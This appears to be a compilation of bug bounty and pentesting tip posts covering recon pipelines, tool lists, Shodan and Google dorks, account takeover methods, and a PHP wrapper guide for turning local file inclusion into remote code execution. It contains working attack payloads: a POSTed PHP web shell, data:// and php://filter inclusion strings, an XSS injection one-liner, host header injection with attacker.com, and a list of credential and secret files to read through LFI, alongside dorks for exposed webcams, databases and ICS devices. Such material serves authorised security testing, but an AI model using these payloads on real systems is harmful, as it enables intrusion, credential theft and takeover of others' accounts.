Advanced Bug Hunting Toolkit


https://lostsec.xyz/

#Toolkit

🔥 ADVANCED BUG BOUNTY RECON PLAYBOOK (2025) 🔥

💰 Deep Recon = Real Money
Most hunters stop at surface-level scans. The real high-value bugs lie in what others overlook.
Here’s your Ultimate Recon Pipeline — battle-tested, fully loaded, and ready to execute:

🔍 1. Scope Review
Know what you're allowed to touch.
➡️ *.target.com
Avoid legal issues & save time by staying within bounds.

🌐 2. Subdomain Enumeration
Tools: bbot, subfinder, amass

bbot -d target.com  
subfinder -d target.com -o subfinder.txt  
amass enum -d target.com -o amass.txt  
cat *.txt | sort -u > subdomains.txt  

🧠 Passive + Active = Deep Coverage

⚡️ 3. Alive Check
Tool: httpx

cat subdomains.txt | httpx -silent -o alive.txt

✅ Only focus on live hosts = efficiency boost.

🕷 4. Crawl Alive Domains
Tool: katana

katana -list alive.txt -o endpoints.txt

Uncover hidden paths & juicy endpoints.

📸 5. Screenshot Everything
Tool: eyewitness

eyewitness --web -f alive.txt --threads 10 -d screenshots

Visually scan for promising targets.

🚨 6. Automated Vuln Scan
Tools: nuclei, nmap, nikto

cat alive.txt | nuclei -t templates/ -o nuclei.txt  
nmap -sVC -T4 -iL alive.txt -oN nmap.txt  
nikto -h alive.txt -output nikto.txt  

💡 Easy wins from common misconfigs & outdated software.

🔬 7. Tech Stack Fingerprinting
Tools: wappalyzer, builtwith, whatruns
Find tech-specific CVEs, weak plugins, and CDN leaks.

🍯 8. Low-Hanging Fruits
Tools: subzy, socialhunter

subzy run --targets alive.txt  
socialhunter -f alive.txt

⚠️ Subdomain Takeovers + Broken Links = easy $$$

🌐 9. URL Gathering & Param Discovery
Tools: waybackurls, gau, paramspider

cat alive.txt | waybackurls >> urls.txt  
cat alive.txt | gau >> urls.txt  
paramspider -d target.com -o params.txt  

📦 Old URLs = Unpatched Gold Mines

🧙 10. Google Dorking

site:target.com ext:sql  
site:target.com inurl:admin  
site:target.com ext:bak 

🧠 Hidden backups, exposed configs, and sensitive portals.

🗂 11. GitHub Recon
Search:

"target.com" in:code

🔑 Leaked API keys, secrets, and config files by devs.

🎯 Bonus: XSS / LFI / SQLi Param Hunt
Tools: gf, qsreplace, httpx

gf xss urls.txt | qsreplace '"><script>alert(1)</script>' | httpx -silent

Auto-test for high-impact bugs at scale.

🧠 Final Take:
✔️ End-to-End Automation
✔️ Focus on overlooked assets
✔️ Hit where it hurts (and pays)

Run this full recon cycle, and you'll outpace 90% of the bug bounty crowd.

🚨 PART 2 — ADVANCED BUG BOUNTY RECON PLAYBOOK 🚨

Stealth, Automation & Finding What Others Miss
Most hunters stop at surface recon.
But the real money? It’s buried deeper.
Welcome to the elite 1%.
This is how you go stealth, automate, and win.

1️⃣ JavaScript Recon — Extract Hidden Gems

JS files hide API endpoints, tokens, secrets.

🔧 Tools: subjs, LinkFinder, JSParser

subjs -i alive.txt -o jsfiles.txt  
cat jsfiles.txt | LinkFinder -i - -o cli > endpoints.txt

➡️ Hidden attack surface unlocked.

2️⃣ Historical Data Mining — Gold in the Past

Old URLs often lead to vulnerable legacy endpoints.

🔧 Tools: waybackurls, gau

cat alive.txt | waybackurls > wayback.txt  
cat alive.txt | gau > gau.txt  
cat wayback.txt gau.txt | sort -u > historical_urls.txt

➡️ Time travel for bugs.

3️⃣ Parameter Discovery — Hunt the Inputs

Params = your entry point for XSS, SQLi, IDOR.

🔧 Tools: ParamSpider, Arjun

paramspider -d target.com -o params.txt  
arjun -i historical_urls.txt -o arjun_params.txt

4️⃣ Virtual Host Enumeration — Hidden Panels
Sometimes, real targets are behind unseen VHOSTs.

🔧 Tools: ffuf, vhostscan

ffuf -u http://target.com -H "Host: FUZZ.target.com" -w subdomains.txt -fs 4242

5️⃣ Cloud Bucket Recon — Jackpot Mode
Open buckets = exposed sensitive data.

🔧 Tools: CloudBrute, S3Scanner

cloudbrute -d target.com -o buckets.txt

6️⃣ Recon Automation — Set & Forget
Real recon doesn’t sleep.

🔧 Tools: recon-pipeline, recon-ng

git clone https://github.com/epi052/recon-pipeline.git  
cd recon-pipeline  
./recon-pipeline.py --target target.com

7️⃣ Stealth Recon — Avoid Getting Blocked
Don’t be loud. Be invisible.

🛡 Tips:
✅ Rotate user-agents
✅ Delay scans
✅ Use proxychains + VPN/TOR


8️⃣ Continuous Monitoring — Be First to Strike

New IPs? Dev errors? You’ll know first.

🔧 Tools: Shodan, SecurityTrails

shodan search "hostname:target.com"

9️⃣ Advanced Google Dorking — Open Secrets
Google knows what they forgot to lock.

💡 Dorks:

site:target.com ext:sql  
site:target.com inurl:admin  
site:target.com intitle:"index of"

🔟 GitHub Recon — Where Devs Slip Up

They push secrets. You collect bounty.

🔧 Tools: gitrob, GitHub Dorks

gitrob target.com

✅ Combine all → Build the ultimate recon pipeline
✅ Find what others miss → Land critical, $$$ bugs

Awesome Asset Discovery

List by x.com/RedHuntLabs

IP Address
Domain/Subdomain
Email
Network
Business Infrastructure
Cloud Infrastructure
Company Info
Internet Survey Data
Social Media / Employee Profiling
Data Leaks
Archived Info

https://github.com/redhuntlabs/Awesome-Asset-Discovery

⚙️ Complete Bug Bounty tool List ⚙️

Enjoy :)

dnscan https://github.com/rbsec/dnscan

Knockpy https://github.com/guelfoweb/knock

Sublist3r https://github.com/aboul3la/Sublist3r

massdns https://github.com/blechschmidt/massdns

Nmap https://nmap.org

Masscan https://github.com/robertdavidgraham/masscan

EyeWitness https://github.com/ChrisTruncer/EyeWitness

DirBuster https://sourceforge.net/projects/dirbuster/

dirsearch https://github.com/maurosoria/dirsearch

Gitrob https://github.com/michenriksen/gitrob

git-secrets https://github.com/awslabs/git-secrets

sandcastle https://github.com/yasinS/sandcastle

bucket_finder https://digi.ninja/projects/bucket_finder.php

GoogD0rker https://github.com/ZephrFish/GoogD0rker/

Wayback Machine https://web.archive.org

waybackurls https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050

Sn1per https://github.com/1N3/Sn1per/

XRay https://github.com/evilsocket/xray

wfuzz https://github.com/xmendez/wfuzz/

patator https://github.com/lanjelot/patator

datasploit https://github.com/DataSploit/datasploit

hydra https://github.com/vanhauser-thc/thc-hydra

changeme https://github.com/ztgrace/changeme

MobSF https://github.com/MobSF/Mobile-Security-Framework-MobSF/

Apktool https://github.com/iBotPeaches/Apktool

dex2jar https://sourceforge.net/projects/dex2jar/

sqlmap http://sqlmap.org/

oxml_xxe https://github.com/BuffaloWill/oxml_xxe/

XXE Injector https://github.com/enjoiz/XXEinjector

The JSON Web Token Toolkit https://github.com/ticarpi/jwt_tool

ground-control https://github.com/jobertabma/ground-control

ssrfDetector https://github.com/JacobReynolds/ssrfDetector

LFISuit https://github.com/D35m0nd142/LFISuite

GitTools https://github.com/internetwache/GitTools

dvcs-ripper https://github.com/kost/dvcs-ripper

tko-subs https://github.com/anshumanbh/tko-subs

HostileSubBruteforcer https://github.com/nahamsec/HostileSubBruteforcer

Race the Web https://github.com/insp3ctre/race-the-web

ysoserial https://github.com/GoSecure/ysoserial

PHPGGC https://github.com/ambionics/phpggc

CORStest https://github.com/RUB-NDS/CORStest

Retire-js https://github.com/RetireJS/retire.js

getsploit https://github.com/vulnersCom/getsploit

Findsploit https://github.com/1N3/Findsploit

bfac https://github.com/mazen160/bfac

WPScan https://wpscan.org/

CMSMap https://github.com/Dionach/CMSmap

Amass https://github.com/OWASP/Amass

Extra Tools
http://projectdiscovery.io

↳Shodan Dorks for OSINT, Recon and Bug Bounty

📸 Exposed Webcams

Finds IP cams running webcamXP software

• Example: http.title:"webcamXP"

🧑‍💻 Open FTP Servers

Finds FTP servers that allow anonymous login

• Example (Anonymous login access): port:21 anonymous

💻 Outdated Operation Systems

Like Finding devices that running Windows 7

• Example: os:"Windows 7"

🌐 Misconfigured MongoDB Databases

Finds exposed MongoDB instances without authentication

• Example: product:"MongoDB" port:27017

🔐 Exposed Login Panels

Identifies admin login portals

• Example: http.title:"Admin Login"

🧭 Specific Geolocation Targets

Finds services exposed in a specific country

• Example: port:22 country:"IN"

🧨 Apache Servers with Expired SSL in the US

Finds Apache web servers with expired SSL certs in the US

• Example: product:"Apache httpd" ssl:"expired" country:"US"

🧪 Devices Vulnerable to CVEs (e.g., Confluence CVE-2021–26084)

Finds potentially vulnerable Confluence servers

• Example: http.html:"Atlassian Confluence" port:8090

🎛 ICS/SCADA Devices

Detects Modbus protocol on industrial systems

• Example: port:502 name:"modbus"

Subdomain Enumeration with Favicon using Shodan:
Shodan Search Query Fundamentals:

#infosec #cybersecurity #bugbounty #pentest #bugbountyTips #shodan #recon #dork

Firing 8 Account Takeover Methods

🔴Unicode Normalization Issue
1. victim account: victim@gmail.com
2. create an account using Unicode | example: vićtim@gmail.com (here is ć is an Unicode character)
✍️ list of Unicode character: 🔗 Link

Note: check where verification doesn’t require

🔴Authorization Issue
1. change email of Account A and put email B
2. check confirmation mail in account B
3. open the confirmation mail from account C
Taken over Account C

🔴Reusing Reset Token
if target allows you to reuse the reset link then hunt for more reset link via gau ,wayback or urlscan.io

🔴Pre Account Takeover
1. signup using normal signup form as a hacker but hacker has no verification link.
2. then if victim signs up using oauth .
3. Verification bypass now attacker can login the victim account without verification link with the password he entered while registering.

🔴CORS Misconfiguration to Account Takeover
1. check api , any endpoint has access access token/session/secret/fingerprint
2. if yes check for CORS misconfiguration does it allow us to fetch data from target?
3. make a payload to fetch data and replace headers and boom

🔴CSRF to ATO
If profile modification in cookie based authentication doesn’t generate any token
1. open Account A change & Put email that you own click save intercept the request and generate a csrf poc.
2. if fully cookie based auth then you dont have to modify anything send the CSRF file to victim.
3. if it requires UUID/UserID or unique token it becomes hard to do that but that doesn't mean it is secure , just start playing with target
hint: password reset page helps many times for UUID/GUID and UserID

🔴Host Header Injection
well in this case there are 4 ways do that.
1. click reset password change host header.
2. or change proxy header ex: X-Forwarded-For: attacker.com
3. or change host, referrer, origin headers at once as attacker.com
4. click reset then click resend mail and do all 3 methods above

🔴Response Manipulation
1. code manipulation * to 200 OK
2. code and body manipulation
code * to 200 OK
body * to {"success":true} or {}

It works when json is being used to transfer and receive data.

#infosec #cybersecurity #bugbounty #pentest #bugbountyTips #ATO

🔥 Mastering PHP Filters & Wrappers for LFI to RCE — FULL GUIDE

⚠️Most hackers stop at reading logs.
The elite use PHP wrappers to turn LFI into remote code execution.
This post is your all-in-one breakdown of how PHP wrappers work and how to exploit them like a pro. 👇

🎯 Why PHP Wrappers Matter in Bug Bounty

PHP provides built-in stream wrappers — special protocols to access I/O sources like files, memory, input/output streams, and even compressed/encrypted data.

As attackers, we can abuse these wrappers to:
✅ Read raw PHP source (even when .php is auto-appended)
✅ Bypass execution to leak secrets
✅ Chain into full RCE
✅ Abuse legacy or misconfigured server behavior

Commonly used wrappers:
▶️ php://filter
▶️ php://input
▶️ php://memory
▶️ data://
▶️ expect://
▶️ zip://
▶️ phar://

🧬 Using php://filter for Source Code Disclosure
This is the most useful wrapper for LFI.

Payload:

php://filter/read=convert.base64-encode/resource=index

Why it works:
✅ read=convert.base64-encode prevents execution of the PHP code
✅ Base64 output = raw, readable source

Example:

http://<IP>/index.php?file=php://filter/read=convert.base64-encode/resource=config

Decode result:

echo 'PD9waHAK...base64...' | base64 -d

Now you see source code, credentials, internal logic, API keys, etc.

🔧 Other Useful PHP Wrappers

1️⃣ php://input

Reads raw POST data.
Good for injecting code during file inclusions via POST.

<?php include('php://input'); ?>

Then POST:

POST /index.php
<?php system($_GET['cmd']); ?>

✅ Shell access via cmd parameter.

2️⃣ expect:// (if available)

Allows direct execution of system commands.

include('expect://ls');

⚠️ Rare but deadly if enabled.

3️⃣ data://

Inline file input using base64 or plaintext.

Example:

include('data://text/plain;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg==');

🟡 Executes: system('whoami')

4️⃣ zip://

✅ Targets ZIP files as file systems.
✅ Abuse via LFI to include malicious entries.

Structure:

zip://path/to/archive.zip#file_inside.txt

Use this with file upload + LFI combo.

5️⃣ phar://

Deserializes metadata → use with Object Injection + LFI.

Upload malicious PHAR:

phar://path/to/phar_file

If unserialize() is called on a phar wrapper, it can lead to RCE.


🔍 Fuzzing PHP Files Before Exploiting

ffuf -w /opt/seclists/.../directory-list.txt -u http://<IP>/FUZZ.php

Watch for:
200 → exists and renders
403/302 → access denied, but still includable via LFI


📁 Standard Inclusion vs. Filtered Inclusion

Including via:

?file=config

🟡 Executes file, no output if file has no HTML.

Using filter:

?file=php://filter/read=convert.base64-encode/resource=config

🟡 Returns base64 source code.


🧪 Decode & Analyze the Source Code

echo 'base64-encoded-content' | base64 -d

Look for:
✅ $db_password, $admin_pass
✅ API endpoints
✅ Sensitive routes
✅ Hardcoded JWT secrets or keys


💣 Advanced Chaining → From LFI to RCE

Read source via php://filter
Find upload paths or SSRF endpoints
Upload malicious phar:// file
Trigger inclusion → RCE

This chain has been used in real-world bounty reports.

🧱 Defense Tips for Developers:
- Disable allow_url_include, allow_url_fopen
- Avoid dynamic include($_GET['page'])
- Use strict whitelists
- Harden php.ini configs
- Monitor suspicious access patterns


🧠 Daily hacking insights
🛠 Payloads & Tools
🐞 Real bug bounty techniques
⚔️ Hands-on exploitation walkthroughs

👍 Like this post if it helped
🔁 Share to boost your hacker circle

🔗 Github link : github.com/cybersecplayground...

#lfi #phpwrappers #bugbounty #phpfilters #rce #infosec #cybersecurity #webpentest #cybersecplayground

🚀 LFI - Interesting Linux files

/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/self/cwd/index.php
/proc/self/cwd/main.py
/home/$USER/.bash_history
/home/$USER/.ssh/id_rsa
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/namespace
/run/secrets/kubernetes.io/serviceaccount/certificate
/var/run/secrets/kubernetes.io/serviceaccount
/var/lib/mlocate/mlocate.db
/var/lib/plocate/plocate.db
/var/lib/mlocate.db

#bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd #infosec #cybersecurity #pentesting #redteam #informationsecurity #securitycipher #technology #coding #code #recon #ai #llm #owasp

Grep tips for Javascript Analysis

💡Note: cat * is for all files from the folder.

🟣Extracting JavaScript Files from recursive Directories

find /path/to/your/folders -name "*.js" -exec mv {} /path/to/target/folder/ \;

🟣Searching for API Keys and Secrets

cat * | grep -rE "apikey|api_key|secret|token|password|auth|key|pass|user"

🟣Detecting Dangerous Function Calls

cat * | grep -rE "eval|document\.write|innerHTML|setTimeout|setInterval|Function"

🟣Checking for URL Manipulation

cat * | grep -rE "location\.href|location\.replace|location\.assign|window\.open"

🟣Searching for Cross-Origin Requests

cat * | grep -rE "XMLHttpRequest|fetch|Access-Control-Allow-Origin|withCredentials" /path/to/js/files

🟣Analyzing postMessage Usage

cat * | grep -r "postMessage"

🟣Finding Hardcoded URLs or Endpoints

cat * | grep -rE "https?://|www\."

🟣Locating Debugging Information

cat * | grep -rE "console\.log|debugger|alert|console\.dir"

🟣Investigating User Input Handling

cat * | grep -rE "document\.getElementById|document\.getElementsByClassName|document\.querySelector|document\.forms"

#infosec #cybersecurity #bugbounty #pentest #bugbountyTips #JS

A Comprehensive Repo for Shodan Dorks

This GitHub repository provides a range of Shodan dorks to find vulnerabilities and configuration issues in various types of devices such as webcams, routers, and servers.

• Repository: https://github.com/nullfuzz-pentest/shodan-dorks

#infosec #cybersecurity #bugbounty #pentest #bugbountyTips #shodan #recon #dork

generate the poc for cors-miss endpoint https://vral-parmar.github.io/CORS-POC-Generator

http://GitBook_s.t.me

🚀 Google Dorks for Bug Bounty & Web Security! 🔍

A powerful list of Google Dorks to uncover hidden files, API endpoints, server errors, and more for pentesting & bug bounty hunting! 🎯


🔥 Broad Domain Search (Exclude Common Subdomains)

site:example.com -www -shop -share -ir -mfa

🔥 PHP Files with Parameters

site:example.com ext:php inurl:?

🔥 API Endpoints Discovery

site:example[.]com inurl:api | site:*/rest | site:*/v1 | site:*/v2 | site:*/v3

🔥 Juicy Extensions (Sensitive Files)

site:"example[.]com" ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess | ext:json

🔥 High-Value InURL Keywords

inurl:conf | inurl:env | inurl:cgi | inurl:bin | inurl:etc | inurl:root | inurl:sql | inurl:backup | inurl:admin | inurl:php site:example[.]com

🔥 Finding Server Errors

inurl:"error" | intitle:"exception" | intitle:"failure" | intitle:"server at" | inurl:exception | "database error" | "SQL syntax" | "undefined index" | "unhandled exception" | "stack trace" site:example[.]com

💥 Master these dorks to find misconfigurations, sensitive data leaks, and security flaws!


📢 #BugBounty #GoogleDorks #OSINT #EthicalHacking #Pentesting #CyberSecurity

List of the most useful curl commands!

🎯 Most Useful curl Commands for Downloading and Interacting with URLs
(With Emoji for Better Understanding)

# 1️⃣ Basic GET Request
Use curl to fetch the content of a URL.

curl https://example.com

# 2️⃣ Save to a File
Use -o to save the downloaded content to a file.

curl -o filename.html https://example.com

# 3️⃣ Display Response Headers
Use -I to only fetch the response headers.

curl -I https://example.com

# 4️⃣ Follow Redirects
Use -L to follow redirects (if the URL redirects you).

curl -L https://example.com

# 5️⃣ Download a File (with Resume)
Use -C to resume a partially downloaded file.

curl -C - -O https://example.com/largefile.zip

# 6️⃣ Show Progress
Use -# to show a progress bar during download.

curl -# -O https://example.com/largefile.zip

# 7️⃣ Download a Torrent
Use -o to download and save a .torrent file.

curl -o ubuntu-22.04.iso.torrent https://releases.ubuntu.com/22.04/ubuntu-22.04.5-live-server-amd64.iso.torrent

# 8️⃣ Send a POST Request
Use -X POST to send data to a server (e.g., form submission).

curl -X POST -d "username=user&password=pass" https://example.com/login

# 9️⃣ Include Custom Headers
Use -H to add custom headers to your request.

curl -H "Authorization: Bearer TOKEN" https://api.example.com/data

# 🔟 Make a PUT Request
Use -X PUT to send data to update a resource.

curl -X PUT -d '{"name": "John"}' -H "Content-Type: application/json" https://example.com/update

# 🔒 Send Data with Authentication
Use -u to pass authentication credentials.

curl -u username:password https://example.com

# 1️⃣1️⃣ Save Cookies
Use -c to save cookies to a file.

curl -c cookies.txt https://example.com

# 1️⃣2️⃣ Use Cookies from a File
Use -b to send cookies from a saved file.

curl -b cookies.txt https://example.com

# 1️⃣3️⃣ Limit Download Speed
Use --limit-rate to limit download speed.

curl --limit-rate 100K -O https://example.com/largefile.zip

# 1️⃣4️⃣ Show Full Request & Response
Use -v for verbose output (request and response details).

curl -v https://example.com

# 1️⃣5️⃣ Send Data as JSON
Use -H and -d to send data as JSON.

curl -X POST -H "Content-Type: application/json" -d '{"key": "value"}' https://example.com/api

# 1️⃣6️⃣ Access a URL with SSL Verification Disabled
Use -k or --insecure to skip SSL certificate verification (not recommended for production).

curl -k https://example.com

# 1️⃣7️⃣ Limit Request Time
Use --max-time to limit the total request time.

curl --max-time 10 https://example.com

# 1️⃣8️⃣ Download Multiple Files
Use -O to download multiple files at once.

curl -O https://example.com/file1.zip -O https://example.com/file2.zip

# 1️⃣9️⃣ Get Information About the URL
Use -I to fetch only headers for a URL.

curl -I https://example.com

# 2️⃣0️⃣ Use a Proxy
Use -x to route your request through a proxy.

curl -x proxy.example.com:8080 https://example.com

If you come across a WordPress website, fuzz for these files and patterns:

.env.bak
.env.php
wp-config-backup.php
wp-config.php.save
wp-config.php~
wp-config.php.old
error_log.log
php_error.log
wp.sql
db.sql
wpbackup.sql
mysql_backup.sql
{TARGET}.zip
{TARGET}-backup.zip

• You can generate wordlists with the patterns above or any pattern you want using Fback:
https://github.com/Spix0r/Fback

#InfoSec #CyberSecurity #Hacking #Course #bugbounty #wordpress #Fuzzing

Author: zarvan
Language: Persian
Telegram channel: @web_articles

A Hacker's Notebook: Real Techniques from the World of Bug Bounty

https://snapdragon-copper-dd1.notion.site/A-Hacker-s-Notebook-Real-Techniques-from-the-World-of-Bug-Bounty-20ea797be4c680e6b542c20a943782d6?pvs=73

By: @bugbountyhints
http://GitBook_s.t.me